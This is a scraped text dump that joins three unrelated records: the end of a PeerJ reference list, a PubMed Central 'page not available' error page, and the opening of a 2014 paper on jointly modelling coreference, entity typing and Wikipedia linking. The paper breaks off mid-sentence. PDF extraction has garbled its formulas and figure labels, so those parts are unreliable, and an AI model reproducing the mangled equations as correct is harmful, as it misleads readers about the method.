http://dx.doi.org/10.1038/483531a http://dx.doi.org/10.1016/j.websem.2015.01.003 http://dx.doi.org/10.1186/1471-2105-15-267 http://dx.doi.org/10.1007/978-90-481-8847-5_13978-90-481-8847-5 http://dx.doi.org/10.1371/journal.pcbi.1002503 http://dx.doi.org/10.1016/j.future.2017.01.012 http://dx.doi.org/10.2777/15242 https://visit.figure-eight.com/rs/416-ZBE-142/images/CrowdFlower_DataScienceReport_2016.pdf https://visit.figure-eight.com/rs/416-ZBE-142/images/CrowdFlower_DataScienceReport_2016.pdf http://dx.doi.org/10.7717/peerj-cs.281 Garijo D, Gil Y. 2012. Augmenting PROV with plans in P-PLAN: scientific processes as linked data. In: LISC@ISWC. Giraldo O, García A, López F, Corcho O. 2017. Using semantics for representing experimental protocols. Journal of Biomedical Semantics 8: Article 52. Gonalves RS, O’Connor MJ, Martnez-Romero M, Egyedi AL, Willrett D, Graybeal J, Musen MA. 2017. The CEDAR workbench: an ontology-assisted environment for authoring metadata that describe scientific experiments. In: The semantic Web— ISWC 2017. 103110 DOI 10.1007/978-3-319-68204-4_10. Gottlieb A, Stein GY, Ruppin E, Sharan R. 2011. PREDICT: a method for inferring novel drug indications with application to personalized medicine. Molecular Systems Biology 7(1):496 DOI 10.1038/msb.2011.26. Gray KA, Yates B, Seal RL, Wright MW, Bruford EA. 2015. Genenames. org: the HGNC resources in 2015. Nucleic Acids Research 43(D1):D1079–D1085. Guizzardi G, Wagner G, Almeida JPA, Guizzardi RSS. 2015. Towards ontological foundations for conceptual modeling: the unified foundational ontology (UFO) story. Applied Ontology 10(3–4):259–271 DOI 10.3233/AO-150157. Hartanto HA, Sarno R, Ariyani NF. 2017. Warning criterion ontology for measuring of compliance in standard operating procedure implementation. Journal of Theoretical and Applied Information Technology 95(24):6867–6880. Hettne K, Wolstencroft K, Belhajjame K, Goble C, Mina E, Dharuri H, Verdes- Montenegro L, Garrido J, De Roure D, Roos M. 2012. Best practices for workflow design: how to prevent workflow decay. In: CEUR workshop proceedings, 952. Hoehndorf R, Hiebert T, Hardy NW, Schofield PN, Gkoutos GV, Dumontier M. 2013. Mouse model phenotypes provide information about human drug targets. Bioinformatics 30(5):719–725 DOI 10.1093/bioinformatics/btt613. Horkoff J, Aydemir FB, Cardoso E, Li T, Maté A, Paja E, Salnitri M, Piras L, My- lopoulos J, Giorgini P. 2019. Goal-oriented requirements engineering: an ex- tended systematic mapping study. Requirements Engineering 24(2):133–160 DOI 10.1007/s00766-017-0280-z. Imming M, Böhmer J, Companjen B, Emery T, Groep D, Murchison K, Schoonhoven R, Sesink L, Som de Cerff W, Sterl A, Franke W. 2018. FAIR data advanced use cases: from principles to practice in the Netherlands. Zenodo. Ioannidis JPA. 2005a. Contradicted and initially stronger effects in highly cited clinical research. JAMA 294(2):218–228 DOI 10.1001/jama.294.2.218. Ioannidis JPA. 2005b. Why most published research findings are false. PLOS Medicine 2(8):e124 DOI 10.1371/journal.pmed.0020124. Jacobsen A, Kaliyaperumal R, Da Silva Santos LOB, Mons B, Schultes E, Roos M, Thompson M. 2019. A generic workflow for the data fairification process. Data Intelligence 2:56–65. Jiang Y, Xiao N, Zhang Y, Zhang L. 2016. A novel flexible activity refinement ap- proach for improving workflow process flexibility. Computers in Industry 80:1–15 DOI 10.1016/j.compind.2016.03.002. Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 26/29 https://peerj.com http://dx.doi.org/10.1007/978-3-319-68204-4_10 http://dx.doi.org/10.1038/msb.2011.26 http://dx.doi.org/10.3233/AO-150157 http://dx.doi.org/10.1093/bioinformatics/btt613 http://dx.doi.org/10.1007/s00766-017-0280-z http://dx.doi.org/10.1001/jama.294.2.218 http://dx.doi.org/10.1371/journal.pmed.0020124 http://dx.doi.org/10.1016/j.compind.2016.03.002 http://dx.doi.org/10.7717/peerj-cs.281 Kanehisa M, Araki M, Goto S, Hattori M, Hirakawa M, Itoh M, Katayama T, Kawashima S, Okuda S, Tokimatsu T, Yamanishi Y. 2007. KEGG for linking genomes to life and the environment. Nucleic Acids Research 36(Database):D480–D484 DOI 10.1093/nar/gkm882. Khan FZ, Soiland-reyes S, Sinnott RO, Lonie A, Goble C, Crusoe MR. 2019. Sharing interoperable work ow provenance: a review of best practices and their practical application in CWLProv. GigaScience 1–26 DOI 10.5281/zenodo.1966881. Klein RA, Ratliff KA, Vianello M, Adams Jr RB, Bahnǐk V, Bernstein MJ, Bocian K, Brandt MJ, Brooks B, Brumbaugh CC, Cemalcilar Z, Chandler J, Cheong W, Davis WE, Devos T, Eisner M, Frankowska N, Furrow D, Galliani EM, Hasselman F, Hicks JA, Hovermale JF, Hunt SJ, Huntsinger JR, Ijzerman H, John M-S, Joy-Gaba JA, Barry Kappes H, Krueger LE, Kurtz J, Levitan CA, Mallett RK, Morris WL, Nelson AJ, Nier JA, Packard G, Pilati R, Rutchick AM, Schmidt K, Skorinko JL, Smith R, Steiner TG, Storbeck J, Van Swol LM, Thompson D, van ’t Veer AE, Vaughn LA, Vranka M, Wichman AL, Woodzicka JA, Nosek BA. 2014. Investigating variation in replicability: A ‘‘many labs’’ replication project. Social Psychology 45(3):142–152 DOI 10.1027/1864-9335/a000178. Krishna A, Poizat P, Salaün G. 2019. Checking business process evolution. Science of Computer Programming 170:1–26 DOI 10.1016/j.scico.2018.09.007. Kuhn M, Campillos M, Letunic I, Jensen LJ, Bork P. 2010. A side effect resource to capture phenotypic effects of drugs. Molecular Systems Biology 6(1):343. Lamb J, Crawford ED, Peck D, Modell JW, Blat IC, Wrobel MJ, Lerner J, Brunet J- P, Subramanian A, Ross KN, Reich M, Hieronymus H, Wei G, Armstrong SA, Haggarty SJ, Clemons PA, Wei R, Carr SA, Lander ES, Golub TR. 2006. The connectivity map: using gene-expression signatures to connect small molecules, genes, and disease. Science 313(5795):1929–1935 DOI 10.1126/science.1132939. Lamprecht A-L, Garcia L, Kuzak M, Martinez C, Arcila R, Martin Del Pico E, Dominguez Del Angel V, van de Sandt S, Ison J, Martinez PA, McQuilton P, Valencia A, Harrow J, Psomopoulos F, Gelpi JL, Chue Hong N, Goble C, Capella- Gutierrez S. 2019. Towards FAIR principles for research software. Data Science 3(1):37–59 DOI 10.3233/DS-190026. Lebo T, Sahoo S, McGuinness D, Belhajjame K, Cheney J, Corsar D, Garijo D, Soiland- Reyes S, Zednik S, Zhao J. 2013. Prov-o: the prov ontology. W3C. Available at https://www.w3.org/TR/prov-o/#:~:text=The%20PROV%20Ontology%20(PROV% 2DO,systems%20and%20under%20different%20contexts. Menche J, Sharma A, Kitsak M, Ghiassian SD, Vidal M, Loscalzo J, Barabási A-L. 2015. Uncovering disease-disease relationships through the incomplete interactome. Science 347(6224):1257601. Moreau L, Freire J, Futrelle J, McGrath RE, Myers J, Paulson P. 2008. The open prove- nance model: an overview. In: International provenance and annotation workshop. Springer, 323–326. Moreira JLR, Sales TP, Guerson J, Braga BFB, Brasileiro F, Sobral V. 2016. Menthor editor: an ontology-driven conceptual modeling platform. In: JOWO@FOIS. Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 27/29 https://peerj.com http://dx.doi.org/10.1093/nar/gkm882 http://dx.doi.org/10.5281/zenodo.1966881 http://dx.doi.org/10.1027/1864-9335/a000178 http://dx.doi.org/10.1016/j.scico.2018.09.007 http://dx.doi.org/10.1126/science.1132939 http://dx.doi.org/10.3233/DS-190026 https://www.w3.org/TR/prov-o/#:~:text=The%20PROV%20Ontology%20(PROV%2DO,systems%20and%20under%20different%20contexts https://www.w3.org/TR/prov-o/#:~:text=The%20PROV%20Ontology%20(PROV%2DO,systems%20and%20under%20different%20contexts http://dx.doi.org/10.7717/peerj-cs.281 Muehlen M. Z, Rosemann M. 2004. Multi-paradigm process management. In: CAiSE Workshops. 169–175. Neil CH, Daniel SK. 2018. FAIR enough? Can we (already) benefit from applying the FAIR data principles to software? Available at https://figshare.com/articles/FAIR_ enough_Can_we_already_benefit_from_applying_the_FAIR_data_principles_to_ software_/7449239 DOI 10.6084/m9.figshare.7449239.v2. Noy NF, Shah NH, Whetzel PL, Dai B, Dorf M, Griffith N, Jonquet C, Rubin DL, Storey M-A, Chute CG, Musen MA. 2009. BioPortal: ontologies and integrated data re- sources at the click of a mouse. Nucleic Acids Research 37(Web Server):W170–W173 DOI 10.1093/nar/gkp440. Pimentel JF, Murta L, Braganholo V, Freire J. 2019. A large-scale study about quality and reproducibility of jupyter notebooks. In: Proceedings of the 16th international conference on mining software repositories. IEEE Press, 507–517. Prinz F, Schlange T, Asadullah K. 2011. Believe it or not: how much can we rely on pub- lished data on potential drug targets? Nature Reviews Drug Discovery 10(9):712–712 DOI 10.1038/nrd3439-c1. Ren Y, Grner G, Lemcke J, Rahmani T, Friesen A, Zhao Y, Pan JZ, Staab S. 2013. Process refinement validation and explanation with ontology reasoning. Service- oriented computing, Berlin: Springer, 515–523. Rosemann M, vom Brocke J. 2015. The six core elements of business process man- agement. In: Vom Brocke J, Rosemann M, eds. Handbook on business process management 1: introduction, methods, and information systems. Berlin, Heidelberg: Springer, 105–122 DOI 10.1007/978-3-642-45100-3_5978-3-642-45100-3. Rospocher M, Ghidini C, Serafini L. 2014. An ontology for the business process modelling notation. Formal Ontology in Information Systems - Proceedings of the Eighth International Conference, FOIS 2014, September, 22–25, 2014, Rio de Janeiro, Brazil. IOS Press 133–146. Samuel S, König-Ries B. 2018a. Combining P-Plan and the REPRODUCE-ME ontology to achieve semantic enrichment of scientific experiments using interactive note- books. In: European semantic web conference. Springer, 126–130. Samuel S, König-Ries B. 2018b. ProvBook: provenance-based semantic enrichment of interactive notebooks for reproducibility. In: Proceedings of the ISWC 2018 Posters Demonstrations, Industry and Blue Sky Ideas Tracks co-located with ISWC. Scannell JW, Blanckley A, Boldon H, Warrington B. 2012. Diagnosing the decline in pharmaceutical R&D efficiency. Nature Reviews Drug Discovery 11(3):191–200 DOI 10.1038/nrd3681. Sirota M, Dudley JT, Kim J, Chiang AP, Morgan AA, Sweet-Cordero A, Sage J, Butte AJ. 2011. Discovery and preclinical validation of drug indications using compendia of public gene expression data. Science Translational Medicine 3(96):96ra77–96ra77 DOI 10.1126/scitranslmed.3001318. Sleigh SH, Barton CL. 2010. Repurposing strategies for therapeutics. Pharmaceutical Medicine 24(3):151–159 DOI 10.1007/bf03256811. Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 28/29 https://peerj.com https://figshare.com/articles/FAIR_enough_Can_we_already_benefit_from_applying_the_FAIR_data_principles_to_software_/7449239 https://figshare.com/articles/FAIR_enough_Can_we_already_benefit_from_applying_the_FAIR_data_principles_to_software_/7449239 https://figshare.com/articles/FAIR_enough_Can_we_already_benefit_from_applying_the_FAIR_data_principles_to_software_/7449239 http://dx.doi.org/10.6084/m9.figshare.7449239.v2 http://dx.doi.org/10.1093/nar/gkp440 http://dx.doi.org/10.1038/nrd3439-c1 http://dx.doi.org/10.1007/978-3-642-45100-3_5978-3-642-45100-3 http://dx.doi.org/10.1038/nrd3681 http://dx.doi.org/10.1126/scitranslmed.3001318 http://dx.doi.org/10.1007/bf03256811 http://dx.doi.org/10.7717/peerj-cs.281 Soiland-Reyes S, Khan FZ, Sinnott R, Lonie A, Crusoe MR, Goble C. 2018. Capturing interoperable reproducible workflows. In: Workshop on research objects: workshop at IEEE eScience 2018. Stephan B, Thomas B, Manfred R. 2012. Bridging the gap between business process models and service composition specifications. In: Jonathan L, Shang-Pin M, Alan L, eds. Service life cycle tools and technologies: methods, trends and advances. Hershey: IGI Global, 124–153 DOI 10.4018/978-1-61350-159-7.ch0079781613501597. Vasilevsky NA, Brush MH, Paddock H, Ponting L, Tripathy SJ, Larocca GM, Haendel MA. 2013. On the reproducibility of science: unique identification of research resources in the biomedical literature. PeerJ 1:e148–e148 DOI 10.7717/peerj.148. Wilkinson MD, Dumontier M, Aalbersberg IJ, Appleton G, Axton M, Baak A, Blomberg N, Boiten J-W, Da Silva Santos LB, Bourne PE, Bouwman J, Brookes AJ, Clark T, Crosas M, Dillo I, Dumon O, Edmunds S, Evelo CT, Finkers R, Gonzalez- Beltran A, Gray A. JG, Groth P, Goble C, Grethe JS, Heringa J, t Hoen P. AC, Hooft R, Kuhn T, Kok R, Kok J, Lusher SJ, Martone ME, Mons A, Packer AL, Persson B, Rocca-Serra P, Roos M, van Schaik R, Sansone S-A, Schultes E, Sengstag T, Slater T, Strawn G, Swertz MA, Thompson M, van der Lei J, van Mulligen E, Velterop J, Waagmeester A, Wittenburg P, Wolstencroft K, Zhao J, Mons B. 2016. The FAIR guiding principles for scientific data management and stewardship. Nature 3:160018 DOI 10.1038/sdata.2016.18. Wishart DS, Knox C, Guo AC, Cheng D, Shrivastava S, Tzur D, Gautam B, Hassanali M. 2008. DrugBank: a knowledgebase for drugs, drug actions and drug targets. Nucleic Acids Research 36(suppl_1):D901–D906. Wu C, Gudivada RC, Aronow BJ, Jegga AG. 2013. Computational drug repositioning through heterogeneous network clustering. BMC Systems Biology 7(Suppl 5):S6–S6 DOI 10.1186/1752-0509-7-S5-S6. Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 29/29 https://peerj.com http://dx.doi.org/10.4018/978-1-61350-159-7.ch0079781613501597 http://dx.doi.org/10.7717/peerj.148 http://dx.doi.org/10.1038/sdata.2016.18 http://dx.doi.org/10.1186/1752-0509-7-S5-S6 http://dx.doi.org/10.7717/peerj-cs.281 work_hqsugbbgx5hlpnrplb7kpus5ai ---- wp-p1m-38.ebi.ac.uk Params is empty 404 sys_1000 exception wp-p1m-38.ebi.ac.uk no 265368483 Params is empty 265368483 exception Params is empty 2021/04/06-17:58:18 if (typeof jQuery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/1.14.8/js/jig.min.js"][/script]'.replace(/\[/g,String.fromCharCode(60)).replace(/\]/g,String.fromCharCode(62))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} Page not available Reason: The web page address (URL) that you used may be incorrect. Message ID: 265368483 (wp-p1m-38.ebi.ac.uk) Time: 2021/04/06 17:58:18 If you need further help, please send an email to PMC. Include the information from the box above in your message. Otherwise, click on one of the following links to continue using PMC: Search the complete PMC archive. Browse the contents of a specific journal in PMC. Find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/MED/ work_hrkwn4taczellcyg24hufs5xk4 ---- A Joint Model for Entity Analysis: Coreference, Typing, and Linking Greg Durrett and Dan Klein Computer Science Division University of California, Berkeley {gdurrett,klein}@cs.berkeley.edu Abstract We present a joint model of three core tasks in the entity analysis stack: coreference res- olution (within-document clustering), named entity recognition (coarse semantic typing), and entity linking (matching to Wikipedia en- tities). Our model is formally a structured con- ditional random field. Unary factors encode local features from strong baselines for each task. We then add binary and ternary factors to capture cross-task interactions, such as the constraint that coreferent mentions have the same semantic type. On the ACE 2005 and OntoNotes datasets, we achieve state-of-the- art results for all three tasks. Moreover, joint modeling improves performance on each task over strong independent baselines.1 1 Introduction How do we characterize the collection of entities present in a document? Two broad threads exist in the literature. The first is coreference resolution (Soon et al., 2001; Ng, 2010; Pradhan et al., 2011), which identifies clusters of mentions in a document referring to the same entity. This process gives us ac- cess to useful information about the referents of pro- nouns and nominal expressions, but because clusters are local to each document, it is often hard to situate document entities in a broader context. A separate line of work has considered the problem of entity linking or “Wikification” (Cucerzan, 2007; Milne and Witten, 2008; Ji and Grishman, 2011), where mentions are linked to entries in a given knowledge 1System available at http://nlp.cs.berkeley.edu base. This is useful for grounding proper entities, but in the absence of coreference gives an incom- plete picture of document content itself, in that nom- inal expressions and pronouns are left unresolved. In this paper, we describe a joint model of corefer- ence, entity linking, and semantic typing (named en- tity recognition) using a structured conditional ran- dom field. Variables in the model capture deci- sions about antecedence, semantic type, and entity links for each mention. Unary factors on these vari- ables incorporate features that are commonly em- ployed when solving each task in isolation. Bi- nary and higher-order factors capture interactions between pairs of tasks. For entity linking and NER, factors capture a mapping between NER’s seman- tic types and Wikipedia’s semantics as described by infoboxes, categories, and article text. Coreference interacts with the other tasks in a more complex way, via factors that softly encourage consistency of semantic types and entity links across coreference arcs, similar to the method of Durrett et al. (2013). Figure 1 shows an example of the effects such fac- tors can capture. The non-locality of coreference factors make exact inference intractable, but we find that belief propagation is a suitable approximation technique and performs well. Our joint modeling of these three tasks is moti- vated by their heavy interdependencies, which have been noted in previous work (discussed more in Section 7). Entity linking has been employed for coreference resolution (Ponzetto and Strube, 2006; Rahman and Ng, 2011; Ratinov and Roth, 2012) and coreference for entity linking (Cheng and Roth, 2013) as part of pipelined systems. Past work has 477 Transactions of the Association for Computational Linguistics, vol. 2, pp. 477–490, 2014. Action Editor: Jason Eisner. Submitted 8/2014; Revised 10/2014; Published November 1, 2014. c©2014 Association for Computational Linguistics. Revenues of $14.5 billion were posted by Dell1. The company1 ... en.wikipedia.org/wiki/Dell en.wikipedia.org/wiki/Michael_Dell Infobox type: company Infobox type: person ORGANIZATION PERSON Figure 1: Coreference can help resolve ambiguous cases of semantic types or entity links: propagating information across coreference arcs can inform us that, in this context, Dell is an organization and should therefore link to the article on Dell in Wikipedia. shown that tighter integration of coreference and entity linking is promising (Hajishirzi et al., 2013; Zheng et al., 2013); we extend these approaches and model the entire process more holistically. Named entity recognition is improved by simple coreference (Finkel et al., 2005; Ratinov and Roth, 2009) and knowledge from Wikipedia (Kazama and Torisawa, 2007; Ratinov and Roth, 2009; Nothman et al., 2013; Sil and Yates, 2013). Joint models of corefer- ence and NER have been proposed in Haghighi and Klein (2010) and Durrett et al. (2013), but in neither case was supervised data used for both tasks. Tech- nically, our model is most closely related to that of Singh et al. (2013), who handle coreference, named entity recognition, and relation extraction.2 Our sys- tem is novel in three ways: the choice of tasks to model jointly, the fact that we maintain uncertainty about all decisions throughout inference (rather than using a greedy approach), and the feature sets we deploy for cross-task interactions. In designing a joint model, we would like to preserve the modularity, efficiency, and structural simplicity of pipelined approaches. Our model’s feature-based structure permits improvement of fea- tures specific to a particular task or to a pair of tasks. By pruning variable domains with a coarse model and using approximate inference via belief propaga- tion, we maintain efficiency and our model is only a factor of two slower than the union of the individual 2Our model could potentially be extended to handle relation extraction or mention detection, which has also been addressed in past joint modeling efforts (Daumé and Marcu, 2005; Li and Ji, 2014), but that is outside the scope of the current work. models. Finally, as a structured CRF, it is concep- tually no more complex than its component models and its behavior can be understood using the same intuition. We apply our model to two datasets, ACE 2005 and OntoNotes, with different mention standards and layers of annotation. In both settings, our joint model outperforms our independent baseline mod- els. On ACE, we achieve state-of-the-art entity link- ing results, matching the performance of the system of Fahrni and Strube (2014). On OntoNotes, we match the performance of the best published coref- erence system (Björkelund and Kuhn, 2014) and outperform two strong NER systems (Ratinov and Roth, 2009; Passos et al., 2014). 2 Motivating Examples We first present two examples to motivate our ap- proach. Figure 1 shows an example of a case where coreference is beneficial for named entity recogni- tion and entity linking. The company is clearly coreferent to Dell by virtue of the lack of other possi- ble antecedents; this in turn indicates that Dell refers to the corporation rather than to Michael Dell. This effect can be captured for entity linking by a fea- ture tying the lexical item company to the fact that COMPANY is in the Wikipedia infobox for Dell,3 thereby helping the linker make the correct decision. This would also be important for recovering the fact that the mention the company links to Dell; how- ever, in the version of the task we consider, a men- tion like the company actually links to the Wikipedia article for Company.4 Figure 2 shows a different example, one where the coreference is now ambiguous but entity linking is transparent. In this case, an NER system based on surface statistics alone would likely predict that Freddie Mac is a PERSON. However, the Wikipedia article for Freddie Mac is unambiguous, which al- lows us to fix this error. The pronoun his can then be correctly resolved. These examples justify why these tasks should be handled jointly: there is no obvious pipeline order for a system designer who cares about the perfor- 3Monospaced fonts indicate titles of Wikipedia articles. 4This decision was largely driven by a need to match the ACE linking annotations provided by Bentivogli et al. (2010). 478 ORGANIZATION PERSON Donald Layton1 took the helm of Freddie Mac2 after his1 ... NIL en.wikipedia.org/wiki/Freddie_Mac PERSON Figure 2: Entity links can help resolve ambiguous cases of coreference and entity types. Standard NER and coreference systems might fail to handle Freddie Mac correctly, but incorporating semantic information from Wikipedia makes this decision easier. mance of the model on all three tasks. 3 Model Our model is a structured conditional random field (Lafferty et al., 2001). The input (conditioning con- text) is the text of a document, automatic parses, and a set of pre-extracted mentions (spans of text). Mentions are allowed to overlap or nest: our model makes no structural assumptions here, and in fact we will show results on datasets with two different men- tion annotation standards (see Section 6.1 and Sec- tion 6.3). Figure 3 shows the random variables in our model. We are trying to predict three distinct types of annotation, so we naturally have one variable per annotation type per mention (of which there are n): • Coreference variables a = (a1, . . . ,an) which indicate antecedents: ai ∈{1, . . . , i−1, NEW}, indicating that the mention refers to some pre- vious mention or that it begins a new cluster. • Named entity type variables t = (t1, . . . , tn) which take values in a fixed inventory of se- mantic types.5 • Entity link variables e = (e1, . . . ,en) which take values in the set of all Wikipedia titles. In addition we have variables q = (q1, . . . ,qn) which represent queries to Wikipedia. These are ex- plained further in Section 3.1.3; for now, it suffices 5For the next few sections, we assume a fixed-mention ver- sion of the NER task, which looks like multi-way classification of semantic types. In Section 6.3.1, we adapt the model to the standard non-fixed-mention setting for OntoNotes. } Dell posted revenues ... The company ... } Dell Michael_Dell ... NEW CLUSTER DellNEW CLUSTER } Company Company (song) ... } }PERSON ORGANIZATION ... }PERSON ORGANIZATION ... }the company company Company }Dell dell N E R C or ef L in k q1 q2 e2e1 a1 a2 t1 t2 Figure 3: Random variables and task-specific factors present in our model. The ai model coreference an- tecedents, the ti model semantic types, the ei model en- tity links, and the qi are latent Wikipedia queries. Factors shown for each task integrate baseline features used when that task is handled in isolation. Coreference factors are described in Section 3.1.1, NER factors are described in Section 3.1.2, and entity linking factors are described in Section 3.1.3. to remark that they are unobserved during both train- ing and testing. We place a log-linear probability distribution over these variables as follows: p(a,t,e|x; θ) ∝ ∑ q exp ( θ>f(a,t,e,q,x) ) where θ is a weight vector, f is a feature function, and x indicates the document text, automatic parses, and mention boundaries. We represent the features in this model with stan- dard factor graph notation; features over a particular set of output variables (and x) are associated with factors connected to those variables. Figure 3 shows the task-specific factors in the model, discussed next in Section 3.1. Higher-order factors coupling vari- ables between tasks are discussed in Section 3.2. 3.1 Independent Model Figure 3 shows a version of the model with only task-specific factors. Though this framework is structurally simple, it is nevertheless powerful enough for us to implement high-performing models for each task. State-of-the-art approaches to coref- erence (Durrett and Klein, 2013) and entity linking (Ratinov et al., 2011) already have this independent 479 structure and Ratinov and Roth (2009) note that it is a reasonable assumption to make for NER as well.6 In this section, we describe the features present in the task-specific factors of each type (which also serve as our three separate baseline systems). 3.1.1 Coreference Our modeling of the coreference output space (as antecedents chosen for each mention) follows the mention-ranking approach to coreference (De- nis and Baldridge, 2008; Durrett and Klein, 2013). Our feature set is that of Durrett and Klein, target- ing surface properties of mentions: for each men- tion, we examine the first word, head word, last word, context words, the mention’s length, and whether the mention is nominal, proper or pronom- inal. Anaphoricity features examine each of these properties in turn; coreference features conjoin var- ious properties between mention pairs and also use properties of the mention pair itself, such as the dis- tance between the mentions and whether their heads match. Note that this baseline does not rely on hav- ing access to named entity chunks. 3.1.2 Named Entity Recognition Our NER model places a distribution over possi- ble semantic types for each mention, which corre- sponds to a fixed span of the input text. We define the features of a span to be the concatenation of stan- dard NER surface features associated with each to- ken in that chunk. We use surface token features similar to those from previous work (Zhang and Johnson, 2003; Ratinov and Roth, 2009; Passos et al., 2014): for tokens at offsets of {−2,−1, 0, 1, 2} from the current token, we fire features based on 1) word identity, 2) POS tag, 3) word class (based on capitalization, presence of numbers, suffixes, etc.), 4) word shape (based on the pattern of uppercase and lowercase letters, digits, and punctuation), 5) Brown cluster prefixes of length 4, 6, 10, 20 using the clus- ters from Koo et al. (2008), and 6) common bigrams of word shape and word identity. 6Pairwise potentials in sequence-based NER are useful for producing coherent output (e.g. prohibiting configurations like O I-PER), but since we have so far defined the task as operating over fixed mentions, this structural constraint does not come into play for our system. 3.1.3 Entity Linking Our entity linking system diverges more sub- stantially from past work than the coreference or NER systems. Most entity linking systems oper- ate in two distinct phases (Cucerzan, 2007; Milne and Witten, 2008; Dredze et al., 2010; Ratinov et al., 2011). First, in the candidate generation phase, a system generates a ranked set of possi- ble candidates for a given mention by querying Wikipedia. The standard approach for doing so is to collect all hyperlinks in Wikipedia and associate each hyperlinked span of text (e.g. Michael Jor- dan) with a distribution over titles of Wikipedia ar- ticles it is observed to link to (Michael Jordan, Michael I. Jordan, etc.). Second, in the dis- ambiguation phase, a learned model selects the cor- rect candidate from the set of possibilities. As noted by Hachey et al. (2013) and Guo et al. (2013), candidate generation is often overlooked and yet accounts for large gaps in performance between different systems. It is not always clear how to best turn the text of a mention into a query for our set of hyperlinks. For example, the phrase Chief Exec- utive Michael Dell has never been hyperlinked on Wikipedia. If we query the substring Michael Dell, the highest-ranked title is correct; however, querying the substring Dell returns the article on the company. Our model for entity linking therefore includes both predictions of final Wikipedia titles ei as well as latent query variables qi that model the choice of query. Given a mention, possible queries are all pre- fixes of the mention containing the head with op- tional truecasing or lemmatization applied. Unary factors on the qi model the appropriateness of a query based on surface text of the mention, in- vestigating the following properties: whether the mention is proper or nominal, whether the query employed truecasing or lemmatization, the query’s length, the POS tag sequence within the query and the tag immediately preceding it, and whether the query is the longest query to yield a nonempty set of candidates for the mention. This part of the model can learn, for example, that queries based on lemma- tized proper names are bad, whereas queries based on lemmatized common nouns are good. Our set of candidates links for a mention is the set of all titles produced by some query. The bi- 480 a1 a2 e1 e2 q1 q2 t1 Dell NE R+ Co ref Li nk +C ore f NE R+ Li nk The company ... posted ... t2N E R C or ef L in k Figure 4: Factors that tie predictions between variables across tasks. Joint NER and entity linking factors (Sec- tion 3.2.1) tie semantic information from Wikipedia ar- ticles to semantic type predictions. Joint coreference and NER factors (Section 3.2.2) couple type decisions between mentions, encouraging consistent type assign- ments within an entity. Joint coreference and entity link- ing factors (Section 3.2.3) encourage relatedness between articles linked from coreferent mentions. nary factors connecting qi and ei then decide which title a given query should yield. These include: the rank of the article title among all possible ti- tles returned by that query (sorted by relative fre- quency count), whether the title is a close string match of the query, and whether the title matches the query up to a parenthetical (e.g. Paul Allen and Paul Allen (editor)). We could also at this point add factors between pairs of variables (ei,ej) to capture coherence be- tween choices of linked entities. Integration with the rest of the model, learning, and inference would re- main unchanged. However, while such features have been employed in past entity linking systems (Rati- nov et al., 2011; Hoffart et al., 2011), Ratinov et al. found them to be of limited utility, so we omit them from the present work. 3.2 Cross-task Interaction Factors We now add factors that tie the predictions of multi- ple output variables in a feature-based way. Figure 4 shows the general structure of these factors. Each couples variables from one pair of tasks. 3.2.1 Entity Linking and NER We want to exploit the semantic information in Wikipedia for better semantic typing of mentions. We also want to use semantic types to disambiguate tricky Wikipedia links. We use three sources of semantics from Wikipedia (Kazama and Torisawa, 2007; Nothman et al., 2013): • Categories (e.g. American financiers); used by Ponzetto and Strube (2006; Kazama and Torisawa (2007; Ratinov and Roth (2012) • Infobox type (e.g. Person, Company) • Copula in the first sentence (is a British politician); used for coreference previously in Haghighi and Klein (2009) We fire features that conjoin the information from the selected Wikipedia article with the selected NER type. Because these types of information from Wikipedia are of a moderate granularity, we should be able to learn a mapping between them and NER types and exploit Wikipedia as a soft gazetteer. 3.2.2 Coreference and NER Coreference can improve NER by ensuring con- sistent semantic type predictions across coreferent mentions; likewise, NER can help coreference by encouraging the system to link up mentions of the same type. The factors we implement for these pur- poses closely resemble the factors employed for la- tent semantic clusters in Durrett et al. (2013). That structure is as follows: log Fi−j(ai, ti, tj) = { 0 if ai 6= j f(i,j,ti, tj) otherwise That is, the features between the type variables for mentions i and j does not come into play unless i and j are coreferent. Note that there are quadrati- cally many such factors in the graph (before prun- ing; see Section 5), one for each ordered pair of mentions (j,i) with j < i. When scoring a partic- ular configuration of variables, only a small subset of the factors is active, but during inference when we marginalize over all settings of variables, each of the factors comes into play for some configuration. 481 This model structure allows us to maintain uncer- tainty about coreference decisions but still propagate information along coreference arcs in a soft way. Given this factor definition, we define features that should fire over coreferent pairs of entity types. Our features target: • The pair of semantic types for the current and antecedent mention • The semantic type of the current mention and the head of the antecedent mention, and the type of the antecedent and head of the current We found such monolexical features to improve over just type pairs and while not suffering from the spar- sity problems of bilexical features. 3.2.3 Coreference and Entity Linking As we said in Section 2, coreferent mentions can actually have different entity links (e.g. Dell and Company), so encouraging equality alone is less ef- fective for entity linking than it is for NER. Our fac- tors have the same structure as those for coreference- NER, but features now target overall semantic relat- edness of Wikipedia articles using the structure of Wikipedia by computing whether the articles have the same title, share any out links, or link to each other. More complex relatedness schemes such as those described in Ratinov et al. (2011) can be im- plemented in this framework. Nevertheless, these basic features still promise to help identify related articles as well as name variations by exploiting the abundance of entity mentions on Wikipedia. 4 Learning Our training data consists of d documents, where a given document consists of a tuple (x,C∗,t∗,e∗). Gold-standard labels for types (t∗) and entity links (e∗) are provided directly, while supervision for coreference is provided in the form of a clustering C∗. Regardless, we can simply marginalize over the uncertainty about a∗ and form the conditional log- likelihood of the training labels as follows: L(θ) = d∑ i=1 log ∑ a∗∈A(C∗i ) p(a∗,t∗i ,e ∗ i |x; θ) where A(C∗) is the set of antecedent structures con- sistent with the gold annotation: the first mention in a cluster must pick the NEW label and subsequent mentions must pick an antecedent from the set of those preceding them in the cluster. This marginal- ization over latent structure has been employed in prior work as well (Fernandes et al., 2012; Durrett and Klein, 2013). We adapt this objective to exploit parameterized loss functions for each task by modifying the distri- bution as follows: p′(a,t,e|x; θ) ∝ p(a,t,e,x) exp [αc`c(a,C∗) +αt`t(t,t ∗) + αe`e(e,e ∗)] where `c, `t, and `e are task-specific loss functions with weight parameters α. This technique, softmax- margin, allows us to shape the distribution learned by the model and encourage the model to move probability mass away from 